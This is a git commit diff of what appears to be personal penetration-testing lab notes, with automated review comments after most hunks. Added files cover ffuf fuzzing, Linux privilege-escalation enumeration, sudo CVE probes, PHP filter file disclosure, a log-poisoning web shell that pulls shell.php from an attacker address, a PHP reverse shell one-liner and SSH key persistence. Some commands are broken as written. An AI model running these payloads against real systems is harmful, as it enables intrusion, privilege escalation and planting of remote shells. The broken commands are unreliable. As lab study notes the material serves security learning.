ffuf et al

Stefan Friese 2021-08-27 00:26:26 +02:00
parent d4648a2f18
commit 853d3ee2bb
14 changed files with 162 additions and 58 deletions

enumeration/Sublist3r Submodule

@ -0,0 +1 @@
Subproject commit 729d649ec5370730172bf6f5314aafd68c874124

enumeration/docs/ffuf.md Normal file

@ -0,0 +1,41 @@
# Fuzz Faster U Fool
## Usage
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
```
* Fuzz dirs
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
```
* Fuzz files
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
```
### Fuzz parameters
```sh
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
```
* Fuzz values
```sh
seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
```
* Fuzz Post Methods
```sh
ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
```
### Fuzz Subdomains
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```
* Fuzz Vhosts & Server Blocks
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
```
### Proxy
* `-replay-proxy <IP>` or `-x <ProxyIP>`
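Review bot: the "Fuzz values" command, `seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33`, will not run as written: the binary is misspelled (`fuff` for `ffuf`) and the single quote opened before `http://` is never closed, so the shell swallows `-c -w - -fw 33` into the URL argument. Suggested: `seq 0 255 | ffuf -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ' -c -w - -fw 33`. Smaller points: the parameter-fuzzing lines use `MACHINE_IP` where every other command uses `<IP>`; the filter values (`-fw 39`, `-fw 33`, `-fs 1435`, `-fs 0`) are given without saying they are the word or size counts of a baseline non-matching response, so a one-line remark on how the baseline was measured would make the notes reusable; and the Proxy bullet presents `-replay-proxy` and `-x` as interchangeable, whereas `-x` routes every request through the proxy and `-replay-proxy` only replays the matched ones.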

@ -0,0 +1,37 @@
# Linux Basic Enumeration
```sh
less ~/.bash_history
```
```sh
cat /etc/*-release
cat /proc/version
uname -a
```
```sh
sudo -V
sudo -L
```
* Check if is writeable
```sh
vim /etc/passwd
vim /etc/hosts
```
```sh
crontab -l
```
* Find interesting files
```sh
find / -perm /6000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name "*.log" 2>/dev/null
find / -type f -name "*.bak" 2>/dev/null
find / -type f -name "*.conf" 2>/dev/null
```
* Open Sockets
```sh
lsof -i
netstat -natup
ss -natup
```
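Review bot: "Check if is writeable" (above `vim /etc/passwd` and `vim /etc/hosts`) is ungrammatical and names the wrong tool for the check: opening the files in an editor risks modifying them and does not answer the question until a save is attempted. `ls -l /etc/passwd /etc/hosts` or `test -w /etc/passwd && echo writable` reports writability without touching the file. Minor: `find / -perm /6000 2>/dev/null` in the "Find interesting files" block matches directories as well as files; adding `-type f` keeps it consistent with the setuid line directly below it.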

@ -1,4 +0,0 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Host: 10.10.156.247 () Status: Up
Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
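Review bot: removing the raw `nmap -oA` output (this `.gnmap` file and the `.nmap` and `.xml` siblings deleted in the following hunks) is the right call, since the files carry a target address and scan timestamps that do not belong in shared notes; to keep them from being re-added by the next `git add .`, pair this deletion with a `.gitignore` entry for `*.gnmap`, `*.nmap` and the nmap `*.xml` files.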

@ -1,19 +0,0 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Nmap scan report for 10.10.156.247
Host is up (0.064s latency).
Not shown: 64293 closed ports, 1231 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
31337/tcp open Elite
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds

@ -1,35 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247 -->
<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.156.247" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports><extraports state="closed" count="64293">
<extrareasons reason="resets" count="64293"/>
</extraports>
<extraports state="filtered" count="1231">
<extrareasons reason="no-responses" count="1231"/>
</extraports>
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
</ports>
<times srtt="64161" rttvar="6610" to="100000"/>
</host>
<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

@ -0,0 +1,9 @@
# CVE-2019-14287
* Versions < 1.8.28
## Usage
* Integer overflow with resulting root status.
```sh
sudo -u#-1 <app>
```
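Review bot: "Integer overflow with resulting root status" does not tell the reader when `sudo -u#-1 <app>` applies. CVE-2019-14287 only matters for an account whose sudoers Runas entry allows every user except root (the `(ALL, !root)` pattern); stating that precondition next to the `Versions < 1.8.28` bullet stops the command being run where it cannot work. A remediation line (fixed in sudo 1.8.28, checkable with `sudo -V`) would complete the note. The hunk header announces 9 added lines but only 7 are visible, so check that nothing was lost in the paste.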

@ -0,0 +1,13 @@
# CVE-2021-3156 Baron Samedit
* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
* Heap based overflow
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
* Check vulnerability via
```sh
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
```
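Review bot: "Check vulnerability via" gives the probe command but not how to read its result, so the note is incomplete as documentation: a patched sudo answers with the `usage:` message, while an affected build errors out with a message starting `sudoedit:` or crashes because the `-s` plus escaped-backslash argument is mishandled. Add that interpretation and the fixed releases (1.8.32 and 1.9.5p2) so the `Versions` bullet has a matching remediation line. Minor: `python -c "print('\x41' * 10000)"` depends on whichever `python` is first in PATH; the expression works on both 2 and 3, but `python3` avoids a missing-interpreter surprise on newer hosts.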

@ -0,0 +1,6 @@
# PHP Filter
* Include into GET query, and get index page, for example
```sh
<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
```
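Review bot: the fenced block is tagged `sh` but holds a URL, not a shell command, so the tag is misleading; use a plain fence or `text`. The note also stops one step short: because of `convert.base64-encode`, the response body is the file base64-encoded, so the reader needs `base64 -d` on it to recover the source, and the bullet should say so.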

@ -0,0 +1,19 @@
# RCE inside HTTP Request
* User Agent can be filled with php code
```sh
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
[...]
```
* copied from browser as curl command:
```
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
```
* go to the access log
```sh
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
```
* Afterwards visit `10.10.211.157/monkey.php`
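Review bot: the three request forms in this note disagree with each other, so at least one of them is not what was actually run: the raw request uses `/var/log/apache2/access.log` with an empty `&ext=`, the curl line uses `/var/log/apache/access.log` (no `2`) with `ext=%20HTTP/1.1`, and the final URL uses `apache2/access` with `ext=.log`. Pick the path that existed and state it once. The curl line also hardcodes a live listener address (`10.9.7.193:8000`) where the raw request uses the `<attacker-IP>:<attacker-Port>` placeholders; use the placeholders throughout so the note does not carry a lab address. Style: the curl block is the only untagged fence in the file (the others are `sh`), and the last block holds a URL rather than a command, so `sh` is the wrong tag there.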

@ -0,0 +1 @@
Subproject commit 40505ce3869707efb7890b55519b3ee829adefbd

@ -0,0 +1,4 @@
# Printer Hacking
* [Preta](https://github.com/RUB-NDS/PRET)
* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)
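Review bot: the link text `Preta` does not match the tool the URL points at, which is PRET (Printer Exploitation Toolkit, RUB-NDS); rename the link so the note is searchable. The hunk header says 4 added lines but 3 are visible.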

@ -0,0 +1,31 @@
# Upgrade Reverse Shell
## Via interpreter
### PHP
* reverse shell
```php
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```
```php
php -r 'exec ("/bin/bash")";'
```
* Sometimes even
```php
php -e 'exec "/bin/bash";'
```
### Python
```python
python -c 'import pty; pty.spawn("/bin/bash")'
```
## Next
1. `ctrl` + `z`
2. `stty echo -raw`
3. `fg`
4. `export TERM=xterm`
## Via SSH
* `ssh-keygen`
* copy priv key and `chmod 600`
* `cat id_rsa.pub > authorized_keys` on target
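Review bot: two of the three PHP one-liners are broken. `php -r 'exec ("/bin/bash")";'` has a stray double quote after the closing parenthesis, so PHP exits with a parse error; it should read `php -r 'exec("/bin/bash");'`. `php -e 'exec "/bin/bash";'` uses `-e`, which in php-cli means "generate extended information for debugger/profiler", not "execute", and `exec "/bin/bash";` is not valid PHP syntax either, so the "Sometimes even" line should be dropped or corrected to the `-r` form. The three fences are tagged `php` but contain shell invocations of the php binary, so `sh` is the right tag. In the "Next" list, step 2 `stty echo -raw` is the reverse of what is wanted before `fg`: the usual sequence is `stty raw -echo; fg`, with `stty sane` run afterwards to restore the local terminal. Finally, `cat id_rsa.pub > authorized_keys` overwrites any keys already present; `>>` appends, and leaving the existing file intact is also what keeps the change reversible at the end of an engagement.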